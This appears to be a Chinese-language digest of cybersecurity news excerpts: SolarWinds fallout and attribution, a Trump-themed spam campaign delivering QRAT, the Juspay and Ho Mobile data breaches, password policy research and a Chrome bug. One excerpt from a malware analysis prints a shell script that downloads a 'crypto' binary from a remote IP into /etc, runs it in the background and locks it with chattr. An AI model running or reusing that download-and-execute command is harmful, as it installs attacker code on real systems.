外媒The Verge援引《华尔街日报》报道称，发现自己受到SolarWinds黑客攻击影响的美国公司和机构名单还在不断增加，他们正在努力应对黑客入侵的一个巨大未知数：攻击程度有多严重。联邦司法系统现在很可能是其中之一，它不会冒任何风险。该机构对此十分担心，尽管目前疫情严重， “根据今天宣布的新程序，向联邦法院提交的高度敏感的法院文件（HSDs）将以纸质形式或通过安全的电子设备被接受，并存储在一个安全的独立计算机系统中。这些密封的HSDs将不会上传到CM/ECF。”...

Cybesecurity研究人员今天观察到一个恶意垃圾邮件活动，该活动通过发布美国总统唐纳德·特朗普（Donald Trump）的丑闻假视频来传播远程访问木马（RAT）。 电子邮件的主题为“ GOOD LOAN OFFER !!”，附带一个名为“ TRUMP_SEX_SCANDAL_VIDEO.jar”的Java存档（JAR）文件，一旦被下载，该文件会将Qua或Quaverse RAT（QRAT）安装到系统中。 Trustwave高级安全研究员戴安娜·洛帕（Diana Lopera）在文章中说：“我们怀疑，黑客正试图利用最近结束的总统大选的噱头进行网络犯罪活动。”...

捷克软件开发公司JetBrains今天声明，否认 《纽约时报》和《华尔街日报》 刊登的JetBrains涉嫌参与SolarWinds黑客攻击事件的报道。 调查人员认为，黑客将JetBrains的产品命名为TeamCity，该产品是用于将组件组装到软件应用程序中的CI / CD（持续集成/持续开发）服务器。 JetBrains首席执行官马克西姆·沙菲罗夫（Maxim Shafirov）发表博客表示： “ SolarWinds是我们TeamCity的用户，这是用作构建软件的持续集成和部署系统 。”...

尽管经常上网的人们已经熟知各个线上服务对于密码强度的规则要求，但卡内基梅隆大学（CMU）的 CyLab 安全隐私实验室主任 Lorrie Cranor 认为，网站和用户其实都可以做到更好。据悉，为了增强被黑客攻破的难度，许多情况下，线上服务都会要求用户输入至少 8 个（或 10~12 个）字符的密码， 举个例子，如果要求在密码中混入数字，很多人可能旨在末位加个“1”。如果要求标点的话，可能只会多个感叹号“！”。如果需要大写的话，那可能首字母就是个大写。...

援引外媒 ZDNet 报道，印度支付处理公司 Juspay 超过 1 亿用户的借记卡、信用卡信息在暗网上销售。Juspay 主要为亚马逊、Swiggy、MakeMyTrip 等公司处理支付业务。 本次泄漏的数据是以数据转储（data dump）的形式，从一个被入侵的 Juspay 服务器中泄漏的。Juspay 已经在其官方博客中确认了此次数据泄露事件，并概述了此次泄露事件的细节。 在官方博客中写道：“我们很痛心地通知您，2020 年 8 月 18 日确实发生了一起数据泄露事件。我们部分用户的非敏感掩码卡信息、手机号码和电子邮件 ID 被泄露”。...

12 月 28 日，沃达丰（Vodafone）旗下意大利运营商 Ho Mobile 被曝发生了用户数据泄露事件。当时一名安全分析师指出，其在某个暗网论坛上发现了有人在兜售电信公司的数据库。虽然一开始打算冷处理，但本周一的时候，Ho Mobile 最终还是证实了本次大规模个人数据泄露。 本周一，Ho Mobile 在官网上发布了一则公告，同时以短信形式向所有受影响客户发送了消息。 早些时候，@Bank_Security 猜测黑客攻破了这家运营商的服务器，并且盗走了详尽的用户数据，包括全名、手机号码、社保号码、电子邮件地址、出生日期、国籍、以及家庭住址。...

Google Chrome 刚刚修复了一个影响浏览器在 Windows 10 操作系统上创建新文件的 Bug 。此前在使用“ImportantFileWriter”输出某些文件时，反病毒软件可能会阻止 Google Chrome 浏览器执行包括新建书签等在内的操作。 据悉，为安全起见，反病毒软件通常会临时锁定系统上新生成的文件，直到对其完成了反病毒扫描、并排除了恶意活动的可能。 谷歌工程师 Bruce Dawson 解释称：“反病毒程序和其它扫描软件可能会暂时锁定新创建的文件，但这可能引发频繁的问题，比如在保存新建的浏览器书签、或其它基于 ImportantFileWriter 执行的操作时”。...

据外媒报道，美FBI、NSA、网络安全与基础设施安全局(CISA)和国家情报总监办公室(ODNI)于当地时间周二发表联合声明称，SolarWinds的黑客行为“可能来自俄罗斯”。这是这四家机构首次将网络攻击归咎于俄罗斯。 声明称：“这项研究表明，一个高级持续性威胁(APT)行为者可能来自俄罗斯，其对最近发现的大部分或全部政府和非政府网络正在进行的网络攻击负有责任。目前，我们认为，这是一项情报收集工作，而且将继续如此。” 美国务卿迈克·蓬佩奥上月曾在接受新闻采访时表示，SolarWinds袭击很可能来自俄罗斯，但直到现在都还没有做出正式声明。...

bash -c
cd /etc
wget -P /etc http://103.45.183.12:808/crypto
chmod 0777 crypto
nohup /etc/crypto > /dev/null 2>&1 &
chattr +i /etc/crypto
echo "/etc/ 木马入侵系统后会接着下载端口爆破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。 观察文件被创建的时间，除了爆破程序sshd和用户名列表user.txt是6月份被修改过（可能是初次创建），...

据《纽约时报》报道，美国网络司令部司令兼美国国安局局长保罗·中曾根在选举日曾报告说，反对俄罗斯干预总统竞选的战斗已经取得了重大成功，并暴露了对方的在线武器、工具和谍报技术。他对记者说：“我们拓宽了行动范围，感觉我们现在的情况非常好。”八周后， 入侵事件曝光三周后，美国官员仍在试图了解俄罗斯人的所作所为，究竟是简单的在美国官僚系统内部进行间谍活动，还是将“后门”接入政府机构、大公司、电网以及开发和运输新一代核武器的实验室。 《纽约时报》认为，至少这些事件已经引发了美国政府和私营部门网络易受攻击的警报，并提出了美国国家网络防御系统为何失败的问题。...